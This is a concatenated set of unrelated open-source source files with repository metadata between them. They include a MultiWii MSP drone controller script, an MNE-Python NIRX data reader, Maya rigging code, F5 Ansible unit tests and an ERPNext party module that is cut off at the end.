self.sendRequestMSP(self.requestMSP(self.MSP_SET_PID, payload, True), True)
def arm(self):
timer = 0
start = time.time()
while timer < 0.5:
data = [1500,1500,2000,1000]
self.sendRequestMSP(self.requestMSP(self.MSP_SET_RAW_RC,data))
time.sleep(0.05)
timer = timer + (time.time() - start)
start = time.time()
def disarm(self):
timer = 0
start = time.time()
while timer < 0.5:
data = [1500,1500,1000,1000]
self.sendRequestMSP(self.requestMSP(self.MSP_SET_RAW_RC,data))
time.sleep(0.05)
timer = timer + (time.time() - start)
start = time.time()
def receiveIMU(self, duration):
timer = 0
start = time.time()
while timer < duration:
self.sendRequestMSP(self.requestMSP(self.MSP_RAW_IMU))
self.receiveData(self.MSP_RAW_IMU)
if self.msp_raw_imu['accx'] > 32768: # 2^15 ...to check if negative number is received
self.msp_raw_imu['accx'] -= 65536 # 2^16 ...converting into 2's complement
if self.msp_raw_imu['accy'] > 32768:
self.msp_raw_imu['accy'] -= 65536
if self.msp_raw_imu['accz'] > 32768:
self.msp_raw_imu['accz'] -= 65536
if self.msp_raw_imu['gyrx'] > 32768:
self.msp_raw_imu['gyrx'] -= 65536
if self.msp_raw_imu['gyry'] > 32768:
self.msp_raw_imu['gyry'] -= 65536
if self.msp_raw_imu['gyrz'] > 32768:
self.msp_raw_imu['gyrz'] -= 65536
print("size: %d, accx: %f, accy: %f, accz: %f, gyrx: %f, gyry: %f, gyrz: %f " %(self.msp_raw_imu['size'], self.msp_raw_imu['accx'], self.msp_raw_imu['accy'], self.msp_raw_imu['accz'], self.msp_raw_imu['gyrx'], self.msp_raw_imu['gyry'], self.msp_raw_imu['gyrz']))
time.sleep(0.04)
timer = timer + (time.time() - start)
start = time.time()
def calibrateIMU(self):
self.sendRequestMSP(self.requestMSP(self.MSP_ACC_CALIBRATION))
time.sleep(0.01)
|
squilter/ardupilot
|
libraries/AP_MSP/Tools/pymsp.py
|
Python
|
gpl-3.0
| 18,847 | 0.014114 |
from setuptools import setup, find_packages
setup(
name="gevent-websocket",
version="0.3.6",
description="Websocket handler for the gevent pywsgi server, a Python network library",
long_description=open("README.rst").read(),
author="Jeffrey Gelens",
author_email="jeffrey@noppo.pro",
license="BSD",
url="https://bitbucket.org/Jeffrey/gevent-websocket",
download_url="https://bitbucket.org/Jeffrey/gevent-websocket",
install_requires=("gevent", "greenlet"),
packages=find_packages(exclude=["examples","tests"]),
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
"Intended Audience :: Developers",
],
)
|
imankulov/gevent-websocket
|
setup.py
|
Python
|
bsd-3-clause
| 946 | 0.002114 |
default_app_config = 'forked_apps.catalogue.config.CatalogueConfig'
|
OWStimpson/oscar_webstore
|
oscar_webstore_root/forked_apps/catalogue/__init__.py
|
Python
|
bsd-3-clause
| 68 | 0 |
# Authors: Robert Luke <mail@robertluke.net>
#
# License: BSD (3-clause)
from configparser import ConfigParser, RawConfigParser
import glob as glob
import re as re
import os.path as op
import numpy as np
from ..base import BaseRaw
from ..constants import FIFF
from ..meas_info import create_info, _format_dig_points
from ...annotations import Annotations
from ...transforms import apply_trans, _get_trans
from ...utils import logger, verbose, fill_doc
from ...utils import warn
@fill_doc
def read_raw_nirx(fname, preload=False, verbose=None):
"""Reader for a NIRX fNIRS recording.
This function has only been tested with NIRScout devices.
Parameters
----------
fname : str
Path to the NIRX data folder or header file.
%(preload)s
%(verbose)s
Returns
-------
raw : instance of RawNIRX
A Raw object containing NIRX data.
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
return RawNIRX(fname, preload, verbose)
def _open(fname):
return open(fname, 'r', encoding='latin-1')
@fill_doc
class RawNIRX(BaseRaw):
"""Raw object from a NIRX fNIRS file.
Parameters
----------
fname : str
Path to the NIRX data folder or header file.
%(preload)s
%(verbose)s
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
@verbose
def __init__(self, fname, preload=False, verbose=None):
from ...externals.pymatreader import read_mat
from ...coreg import get_mni_fiducials # avoid circular import prob
logger.info('Loading %s' % fname)
if fname.endswith('.hdr'):
fname = op.dirname(op.abspath(fname))
if not op.isdir(fname):
raise RuntimeError('The path you specified does not exist.')
# Check if required files exist and store names for later use
files = dict()
keys = ('hdr', 'inf', 'set', 'tpl', 'wl1', 'wl2',
'config.txt', 'probeInfo.mat')
for key in keys:
files[key] = glob.glob('%s/*%s' % (fname, key))
if len(files[key]) != 1:
raise RuntimeError('Expect one %s file, got %d' %
(key, len(files[key]),))
files[key] = files[key][0]
if len(glob.glob('%s/*%s' % (fname, 'dat'))) != 1:
warn("A single dat file was expected in the specified path, but "
"got %d. This may indicate that the file structure has been "
"modified since the measurement was saved." %
(len(glob.glob('%s/*%s' % (fname, 'dat')))))
# Read number of rows/samples of wavelength data
last_sample = -1
with _open(files['wl1']) as fid:
for line in fid:
last_sample += 1
# Read header file
# The header file isn't compliant with the configparser. So all the
# text between comments must be removed before passing to parser
with _open(files['hdr']) as f:
hdr_str = f.read()
hdr_str = re.sub('#.*?#', '', hdr_str, flags=re.DOTALL)
hdr = RawConfigParser()
hdr.read_string(hdr_str)
# Check that the file format version is supported
if not any(item == hdr['GeneralInfo']['NIRStar'] for item in
["\"15.0\"", "\"15.2\""]):
raise RuntimeError('MNE does not support this NIRStar version'
' (%s)' % (hdr['GeneralInfo']['NIRStar'],))
if "NIRScout" not in hdr['GeneralInfo']['Device']:
warn("Only import of data from NIRScout devices have been "
"thoroughly tested. You are using a %s device. " %
hdr['GeneralInfo']['Device'])
# Parse required header fields
# Extract frequencies of light used by machine
fnirs_wavelengths = [int(s) for s in
re.findall(r'(\d+)',
hdr['ImagingParameters']['Wavelengths'])]
# Extract source-detectors
sources = np.asarray([int(s) for s in re.findall(r'(\d+)-\d+:\d+',
hdr['DataStructure']['S-D-Key'])], int)
detectors = np.asarray([int(s) for s in re.findall(r'\d+-(\d+):\d+',
hdr['DataStructure']['S-D-Key'])], int)
# Determine if short channels are present and on which detectors
if 'shortbundles' in hdr['ImagingParameters']:
short_det = [int(s) for s in
re.findall(r'(\d+)',
hdr['ImagingParameters']['ShortDetIndex'])]
short_det = np.array(short_det, int)
else:
short_det = []
# Extract sampling rate
samplingrate = float(hdr['ImagingParameters']['SamplingRate'])
# Read participant information file
inf = ConfigParser(allow_no_value=True)
inf.read(files['inf'])
inf = inf._sections['Subject Demographics']
# Store subject information from inf file in mne format
# Note: NIRX also records "Study Type", "Experiment History",
# "Additional Notes", "Contact Information" and this information
# is currently discarded
subject_info = {}
names = inf['name'].split()
if len(names) > 0:
subject_info['first_name'] = \
inf['name'].split()[0].replace("\"", "")
if len(names) > 1:
subject_info['last_name'] = \
inf['name'].split()[-1].replace("\"", "")
if len(names) > 2:
subject_info['middle_name'] = \
inf['name'].split()[-2].replace("\"", "")
# subject_info['birthday'] = inf['age'] # TODO: not formatted properly
subject_info['sex'] = inf['gender'].replace("\"", "")
# Recode values
if subject_info['sex'] in {'M', 'Male', '1'}:
subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_MALE
elif subject_info['sex'] in {'F', 'Female', '2'}:
subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_FEMALE
# NIRStar does not record an id, or handedness by default
# Read information about probe/montage/optodes
# A word on terminology used here:
# Sources produce light
# Detectors measure light
# Sources and detectors are both called optodes
# Each source - detector pair produces a channel
# Channels are defined as the midpoint between source and detector
mat_data = read_mat(files['probeInfo.mat'], uint16_codec=None)
requested_channels = mat_data['probeInfo']['probes']['index_c']
src_locs = mat_data['probeInfo']['probes']['coords_s3'] / 100.
det_locs = mat_data['probeInfo']['probes']['coords_d3'] / 100.
ch_locs = mat_data['probeInfo']['probes']['coords_c3'] / 100.
# These are all in MNI coordinates, so let's transform them to
# the Neuromag head coordinate frame
mri_head_t, _ = _get_trans('fsaverage', 'mri', 'head')
src_locs = apply_trans(mri_head_t, src_locs)
det_locs = apply_trans(mri_head_t, det_locs)
ch_locs = apply_trans(mri_head_t, ch_locs)
# Set up digitization
dig = get_mni_fiducials('fsaverage', verbose=False)
for fid in dig:
fid['r'] = apply_trans(mri_head_t, fid['r'])
fid['coord_frame'] = FIFF.FIFFV_COORD_HEAD
for ii, ch_loc in enumerate(ch_locs, 1):
dig.append(dict(
kind=FIFF.FIFFV_POINT_EEG, # misnomer but probably okay
r=ch_loc,
ident=ii,
coord_frame=FIFF.FIFFV_COORD_HEAD,
))
dig = _format_dig_points(dig)
del mri_head_t
# Determine requested channel indices
# The wl1 and wl2 files include all possible source - detector pairs.
# But most of these are not relevant. We want to extract only the
# subset requested in the probe file
req_ind = np.array([], int)
for req_idx in range(requested_channels.shape[0]):
sd_idx = np.where((sources == requested_channels[req_idx][0]) &
(detectors == requested_channels[req_idx][1]))
req_ind = np.concatenate((req_ind, sd_idx[0]))
req_ind = req_ind.astype(int)
# Generate meaningful channel names
def prepend(list, str):
str += '{0}'
list = [str.format(i) for i in list]
return(list)
snames = prepend(sources[req_ind], 'S')
dnames = prepend(detectors[req_ind], '_D')
sdnames = [m + str(n) for m, n in zip(snames, dnames)]
sd1 = [s + ' ' + str(fnirs_wavelengths[0]) for s in sdnames]
sd2 = [s + ' ' + str(fnirs_wavelengths[1]) for s in sdnames]
chnames = [val for pair in zip(sd1, sd2) for val in pair]
# Create mne structure
info = create_info(chnames,
samplingrate,
ch_types='fnirs_cw_amplitude')
info.update(subject_info=subject_info, dig=dig)
# Store channel, source, and detector locations
# The channel location is stored in the first 3 entries of loc.
# The source location is stored in the second 3 entries of loc.
# The detector location is stored in the third 3 entries of loc.
# NIRx NIRSite uses MNI coordinates.
# Also encode the light frequency in the structure.
for ch_idx2 in range(requested_channels.shape[0]):
# Find source and store location
src = int(requested_channels[ch_idx2, 0]) - 1
info['chs'][ch_idx2 * 2]['loc'][3:6] = src_locs[src, :]
info['chs'][ch_idx2 * 2 + 1]['loc'][3:6] = src_locs[src, :]
# Find detector and store location
det = int(requested_channels[ch_idx2, 1]) - 1
info['chs'][ch_idx2 * 2]['loc'][6:9] = det_locs[det, :]
info['chs'][ch_idx2 * 2 + 1]['loc'][6:9] = det_locs[det, :]
# Store channel location as midpoint between source and detector.
midpoint = (src_locs[src, :] + det_locs[det, :]) / 2
info['chs'][ch_idx2 * 2]['loc'][:3] = midpoint
info['chs'][ch_idx2 * 2 + 1]['loc'][:3] = midpoint
info['chs'][ch_idx2 * 2]['loc'][9] = fnirs_wavelengths[0]
info['chs'][ch_idx2 * 2 + 1]['loc'][9] = fnirs_wavelengths[1]
# Extract the start/stop numbers for samples in the CSV. In theory the
# sample bounds should just be 10 * the number of channels, but some
# files have mixed \n and \n\r endings (!) so we can't rely on it, and
# instead make a single pass over the entire file at the beginning so
# that we know how to seek and read later.
bounds = dict()
for key in ('wl1', 'wl2'):
offset = 0
bounds[key] = [offset]
with open(files[key], 'rb') as fid:
for line in fid:
offset += len(line)
bounds[key].append(offset)
assert offset == fid.tell()
# Extras required for reading data
raw_extras = {
'sd_index': req_ind,
'files': files,
'bounds': bounds,
}
super(RawNIRX, self).__init__(
info, preload, filenames=[fname], last_samps=[last_sample],
raw_extras=[raw_extras], verbose=verbose)
# Read triggers from event file
if op.isfile(files['hdr'][:-3] + 'evt'):
with _open(files['hdr'][:-3] + 'evt') as fid:
t = [re.findall(r'(\d+)', line) for line in fid]
onset = np.zeros(len(t), float)
duration = np.zeros(len(t), float)
description = [''] * len(t)
for t_idx in range(len(t)):
binary_value = ''.join(t[t_idx][1:])[::-1]
trigger_frame = float(t[t_idx][0])
onset[t_idx] = (trigger_frame) * (1.0 / samplingrate)
duration[t_idx] = 1.0 # No duration info stored in files
description[t_idx] = int(binary_value, 2) * 1.
annot = Annotations(onset, duration, description)
self.set_annotations(annot)
def _read_segment_file(self, data, idx, fi, start, stop, cals, mult):
"""Read a segment of data from a file.
The NIRX machine records raw data as two different wavelengths.
The returned data interleaves the wavelengths.
"""
sdindex = self._raw_extras[fi]['sd_index']
wls = [
_read_csv_rows_cols(
self._raw_extras[fi]['files'][key],
start, stop, sdindex,
self._raw_extras[fi]['bounds'][key]).T
for key in ('wl1', 'wl2')
]
# TODO: Make this more efficient by only indexing above what we need.
# For now let's just construct the full data matrix and index.
# Interleave wavelength 1 and 2 to match channel names:
this_data = np.zeros((len(wls[0]) * 2, stop - start))
this_data[0::2, :] = wls[0]
this_data[1::2, :] = wls[1]
data[:] = this_data[idx]
return data
def _read_csv_rows_cols(fname, start, stop, cols, bounds):
with open(fname, 'rb') as fid:
fid.seek(bounds[start])
data = fid.read(bounds[stop] - bounds[start]).decode('latin-1')
x = np.fromstring(data, float, sep=' ')
x.shape = (stop - start, -1)
x = x[:, cols]
return x
|
Teekuningas/mne-python
|
mne/io/nirx/nirx.py
|
Python
|
bsd-3-clause
| 13,599 | 0 |
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.subsystem.subsystem import Subsystem
class PluginSubsystemBase(Subsystem):
@classmethod
def register_options(cls, register):
super(PluginSubsystemBase, cls).register_options(register)
# All checks have this option.
register('--skip', default=False, action='store_true',
help='If enabled, skip this style checker.')
def get_plugin(self, python_file):
return self.get_plugin_type()(self.get_options(), python_file)
def get_plugin_type(self):
raise NotImplementedError('get_plugin() not implemented in class {}'.format(type(self)))
|
qma/pants
|
src/python/pants/backend/python/tasks/checkstyle/plugin_subsystem_base.py
|
Python
|
apache-2.0
| 886 | 0.006772 |
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
import maya.cmds as cmds
import constants as const
import rigBuildLib as complib
reload(complib)
class Component(object):
def __init__(self):
self.cmpdata = {}
self.compName = None
self.compSide = None
self.compColor = None
def defineComponent(self, name, side):
"""
Creates the base layout for the component as it would appear in scene
:param name: The name of the component
:param side: The side of the component
:return:
"""
self.compName = name
self.compSide = side
data = {}
data[name] = {}
data[name]['layers'] = ["input", "output", "control", "parts", "deform", 'definition']
data[name]['inputs'] = ["componentDomain"]
data[name]['parts'] = ["hidden"]
self.setCompColor()
return data
@property
def data(self):
return self.cmpdata
@property
def layer(self):
return self.cmpdata
@property
def name(self):
return self.compName
@property
def side(self):
return self.compSide
@property
def color(self):
return self.compColor
def setCompColor(self):
if self.side == "L":
self.compColor = 14
elif self.side == "R":
self.compColor = 13
else:
self.compColor = 25
def addCustomInput(self, name):
grpName = "{}_input".format(name)
inputGrp = complib.createGroup(grpName, self.name, self.side,)
complib.createDefaultMetaData(inputGrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputGrp, self.cmpdata['input'])
self.cmpdata[name] = inputGrp
def addCustomPartsGroup(self, name):
grpName = "{}_{}".format(name, const.GROUP_SUFFIX['master'])
inputGrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(inputGrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputGrp, self.cmpdata['parts'])
self.cmpdata[name] = inputGrp
def createComponent(self, name = None, side = None):
"""
Builds the component using the name and side supplied and the definition layers
:param name: The name of the component
:param side: The side of the component eg L R M
:type name: String
:type side: String
:return:
"""
GRPSUFX = const.GROUP_SUFFIX['master']
## Define the component layout now
data = self.defineComponent(name, side)
data['name'] = name
data['side'] = side
## Build the groups
## TOP GROUP
grpName = "{GRPSUFX}".format(**locals())
baseGrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(baseGrp, self.name, self.side, 'componentMasterGroup')
## LAYERS
layers = data[name]["layers"]
for eachLayer in layers:
grpName = "{eachLayer}".format(**locals())
lgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(lgrp, self.name, self.side, 'componentGroup')
data[eachLayer] = lgrp
complib.parentTo(lgrp, baseGrp)
### INPUTS
## Doesn't handle buffers, this just does straight single inputs
for eachInput in data[name]['inputs']:
grpName = "{eachInput}_srt".format(**locals())
inputgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(inputgrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputgrp, data['input'])
if eachInput == 'componentDomain':
data["componentDomain"] = inputgrp
### PARTS
for eachPart in data[name]['parts']:
grpName = "{eachPart}_{GRPSUFX}".format(**locals())
partsgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(partsgrp, self.name, self.side, 'componentGroup')
complib.parentTo(partsgrp, data['parts'])
logger.info('Component {name}_{side} created successfully.'.format(**locals()))
logger.info('Component data: {data}'.format(**locals()))
self.cmpdata = data
logger.info('self.cmpdata: {}'.format(self.cmpdata))
return self.cmpdata
|
jamesbdunlop/defaultMayaLibrary
|
tools/rigComponentBuilder.py
|
Python
|
apache-2.0
| 4,466 | 0.005598 |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import sys
from nose.plugins.skip import SkipTest
if sys.version_info < (2, 7):
raise SkipTest("F5 Ansible modules require Python >= 2.7")
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigip_gtm_pool import ApiParameters
from library.modules.bigip_gtm_pool import ModuleParameters
from library.modules.bigip_gtm_pool import ModuleManager
from library.modules.bigip_gtm_pool import ArgumentSpec
from library.modules.bigip_gtm_pool import UntypedManager
from library.modules.bigip_gtm_pool import TypedManager
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
from test.unit.modules.utils import set_module_args
except ImportError:
try:
from ansible.modules.network.f5.bigip_gtm_pool import ApiParameters
from ansible.modules.network.f5.bigip_gtm_pool import ModuleParameters
from ansible.modules.network.f5.bigip_gtm_pool import ModuleManager
from ansible.modules.network.f5.bigip_gtm_pool import ArgumentSpec
from ansible.modules.network.f5.bigip_gtm_pool import UntypedManager
from ansible.modules.network.f5.bigip_gtm_pool import TypedManager
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
from units.modules.utils import set_module_args
except ImportError:
raise SkipTest("F5 Ansible modules require the f5-sdk Python library")
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
name='foo',
preferred_lb_method='topology',
alternate_lb_method='ratio',
fallback_lb_method='fewest-hops',
fallback_ip='10.10.10.10',
type='a'
)
p = ModuleParameters(params=args)
assert p.name == 'foo'
assert p.preferred_lb_method == 'topology'
assert p.alternate_lb_method == 'ratio'
assert p.fallback_lb_method == 'fewest-hops'
assert p.fallback_ip == '10.10.10.10'
assert p.type == 'a'
def test_module_parameters_members(self):
args = dict(
partition='Common',
members=[
dict(
server='foo',
virtual_server='bar'
)
]
)
p = ModuleParameters(params=args)
assert len(p.members) == 1
assert p.members[0] == '/Common/foo:bar'
def test_api_parameters(self):
args = dict(
name='foo',
loadBalancingMode='topology',
alternateMode='ratio',
fallbackMode='fewest-hops',
fallbackIp='10.10.10.10'
)
p = ApiParameters(params=args)
assert p.name == 'foo'
assert p.preferred_lb_method == 'topology'
assert p.alternate_lb_method == 'ratio'
assert p.fallback_lb_method == 'fewest-hops'
assert p.fallback_ip == '10.10.10.10'
def test_api_parameters_members(self):
args = load_fixture('load_gtm_pool_a_with_members_1.json')
p = ApiParameters(params=args)
assert len(p.members) == 3
assert p.members[0] == '/Common/server1:vs1'
assert p.members[1] == '/Common/server1:vs2'
assert p.members[2] == '/Common/server1:vs3'
class TestUntypedManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_create_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='round-robin',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'round-robin'
def test_update_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='topology',
alternate_lb_method='drop-packet',
fallback_lb_method='cpu',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
current = ApiParameters(params=load_fixture('load_gtm_pool_untyped_default.json'))
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[True, True])
tm.update_on_device = Mock(return_value=True)
tm.read_current_from_device = Mock(return_value=current)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'topology'
assert results['alternate_lb_method'] == 'drop-packet'
assert results['fallback_lb_method'] == 'cpu'
def test_delete_pool(self, *args):
set_module_args(dict(
name='foo',
state='absent',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[True, False])
tm.remove_from_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
class TestTypedManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_create_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='round-robin',
type='a',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = TypedManager(module=module)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=False)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'round-robin'
def test_update_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='topology',
alternate_lb_method='drop-packet',
fallback_lb_method='cpu',
type='a',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
current = ApiParameters(params=load_fixture('load_gtm_pool_a_default.json'))
# Override methods in the specific type of manager
tm = TypedManager(module=module)
tm.exists = Mock(side_effect=[True, True])
tm.update_on_device = Mock(return_value=True)
tm.read_current_from_device = Mock(return_value=current)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=False)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'topology'
assert results['alternate_lb_method'] == 'drop-packet'
assert results['fallback_lb_method'] == 'cpu'
def test_delete_pool(self, *args):
set_module_args(dict(
name='foo',
type='a',
state='absent',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = TypedManager(module=module)
tm.exists = Mock(side_effect=[True, False])
tm.remove_from_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=False)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
|
alexlo03/ansible
|
test/units/modules/network/f5/test_bigip_gtm_pool.py
|
Python
|
gpl-3.0
| 11,200 | 0.000446 |
import sys
from deriva.transfer import DerivaBackupCLI
DESC = "Deriva Catalog Backup Utility - CLI"
INFO = "For more information see: https://github.com/informatics-isi-edu/deriva-py"
def main():
cli = DerivaBackupCLI(DESC, INFO, hostname_required=True, config_file_required=False)
return cli.main()
if __name__ == '__main__':
sys.exit(main())
|
informatics-isi-edu/deriva-py
|
deriva/transfer/backup/__main__.py
|
Python
|
apache-2.0
| 361 | 0.00554 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import datetime
from frappe import _, msgprint, scrub
from frappe.defaults import get_user_permissions
from frappe.model.utils import get_fetch_values
from frappe.utils import (add_days, getdate, formatdate, get_first_day, date_diff,
add_years, get_timestamp, nowdate, flt)
from frappe.contacts.doctype.address.address import (get_address_display,
get_default_address, get_company_address)
from frappe.contacts.doctype.contact.contact import get_contact_details, get_default_contact
from erpnext.exceptions import PartyFrozen, PartyDisabled, InvalidAccountCurrency
from erpnext.accounts.utils import get_fiscal_year
from erpnext import get_default_currency, get_company_currency
class DuplicatePartyAccountError(frappe.ValidationError): pass
@frappe.whitelist()
def get_party_details(party=None, account=None, party_type="Customer", company=None,
posting_date=None, price_list=None, currency=None, doctype=None, ignore_permissions=False):
if not party:
return {}
if not frappe.db.exists(party_type, party):
frappe.throw(_("{0}: {1} does not exists").format(party_type, party))
return _get_party_details(party, account, party_type,
company, posting_date, price_list, currency, doctype, ignore_permissions)
def _get_party_details(party=None, account=None, party_type="Customer", company=None,
posting_date=None, price_list=None, currency=None, doctype=None, ignore_permissions=False):
out = frappe._dict(set_account_and_due_date(party, account, party_type, company, posting_date, doctype))
party = out[party_type.lower()]
if not ignore_permissions and not frappe.has_permission(party_type, "read", party):
frappe.throw(_("Not permitted for {0}").format(party), frappe.PermissionError)
party = frappe.get_doc(party_type, party)
currency = party.default_currency if party.default_currency else get_company_currency(company)
set_address_details(out, party, party_type, doctype, company)
set_contact_details(out, party, party_type)
set_other_values(out, party, party_type)
set_price_list(out, party, party_type, price_list)
out["taxes_and_charges"] = set_taxes(party.name, party_type, posting_date, company, out.customer_group, out.supplier_type)
if not out.get("currency"):
out["currency"] = currency
# sales team
if party_type=="Customer":
out["sales_team"] = [{
"sales_person": d.sales_person,
"allocated_percentage": d.allocated_percentage or None
} for d in party.get("sales_team")]
return out
def set_address_details(out, party, party_type, doctype=None, company=None):
billing_address_field = "customer_address" if party_type == "Lead" \
else party_type.lower() + "_address"
out[billing_address_field] = get_default_address(party_type, party.name)
if doctype:
out.update(get_fetch_values(doctype, billing_address_field, out[billing_address_field]))
# address display
out.address_display = get_address_display(out[billing_address_field])
# shipping address
if party_type in ["Customer", "Lead"]:
out.shipping_address_name = get_default_address(party_type, party.name, 'is_shipping_address')
out.shipping_address = get_address_display(out["shipping_address_name"])
if doctype:
out.update(get_fetch_values(doctype, 'shipping_address_name', out.shipping_address_name))
if doctype and doctype in ['Delivery Note', 'Sales Invoice']:
out.update(get_company_address(company))
if out.company_address:
out.update(get_fetch_values(doctype, 'company_address', out.company_address))
def set_contact_details(out, party, party_type):
out.contact_person = get_default_contact(party_type, party.name)
if not out.contact_person:
out.update({
"contact_person": None,
"contact_display": None,
"contact_email": None,
"contact_mobile": None,
"contact_phone": None,
"contact_designation": None,
"contact_department": None
})
else:
out.update(get_contact_details(out.contact_person))
def set_other_values(out, party, party_type):
# copy
if party_type=="Customer":
to_copy = ["customer_name", "customer_group", "territory", "language"]
else:
to_copy = ["supplier_name", "supplier_type", "language"]
for f in to_copy:
out[f] = party.get(f)
# fields prepended with default in Customer doctype
for f in ['currency'] \
+ (['sales_partner', 'commission_rate'] if party_type=="Customer" else []):
if party.get("default_" + f):
out[f] = party.get("default_" + f)
def get_default_price_list(party):
"""Return default price list for party (Document object)"""
if party.default_price_list:
return party.default_price_list
if party.doctype == "Customer":
price_list = frappe.db.get_value("Customer Group",
party.customer_group, "default_price_list")
if price_list:
return price_list
return None
def set_price_list(out, party, party_type, given_price_list):
# price list
price_list = filter(None, get_user_permissions().get("Price List", []))
if isinstance(price_list, list):
price_list = price_list[0] if len(price_list)==1 else None
if not price_list:
price_list = get_default_price_list(party)
if not price_list:
price_list = given_price_list
if price_list:
out.price_list_currency = frappe.db.get_value("Price List", price_list, "currency")
out["selling_price_list" if party.doctype=="Customer" else "buying_price_list"] = price_list
def set_account_and_due_date(party, account, party_type, company, posting_date, doctype):
if doctype not in ["Sales Invoice", "Purchase Invoice"]:
# not an invoice
return {
party_type.lower(): party
}
if party:
account = get_party_account(party_type, party, company)
account_fieldname = "debit_to" if party_type=="Customer" else "credit_to"
out = {
party_type.lower(): party,
account_fieldname : account,
"due_date": get_due_date(posting_date, party_type, party, company)
}
return out
@frappe.whitelist()
def get_party_account(party_type, party, company):
"""Returns the account for the given `party`.
Will first search in party (Customer / Supplier) record, if not found,
will search in group (Customer Group / Supplier Type),
finally will return default."""
if not company:
frappe.throw(_("Please select a Company"))
if party:
account = frappe.db.get_value("Party Account",
